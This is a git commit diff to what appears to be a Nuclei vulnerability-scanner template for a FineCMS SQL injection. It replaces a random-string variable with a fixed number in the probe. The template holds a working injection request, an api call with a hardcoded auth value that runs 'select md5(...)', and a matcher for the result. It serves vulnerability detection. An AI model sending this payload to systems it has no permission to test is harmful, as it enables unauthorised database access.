Update finecms-sqli.yaml

patch-1
Ritik Chaddha 2022-06-30 08:30:16 +05:30 committed by GitHub
parent b1f9fc94d6
commit 5729e6486a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 2 deletions

View File

@ -10,12 +10,15 @@ info:
- https://blog.csdn.net/dfdhxb995397/article/details/101385340 - https://blog.csdn.net/dfdhxb995397/article/details/101385340
tags: finecms,sqli tags: finecms,sqli
variables:
num: "999999999"
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/index.php?c=api&m=data2&auth=582f27d140497a9d8f048ca085b111df&param=action=sql%20sql=%27select%20md5("{{randstr}}")%27' - '{{BaseURL}}/index.php?c=api&m=data2&auth=582f27d140497a9d8f048ca085b111df&param=action=sql%20sql=%27select%20md5({{num}})%27'
matchers: matchers:
- type: word - type: word
words: words:
- '{{md5("{{randstr}}")}}' - '{{md5({{num}})}}'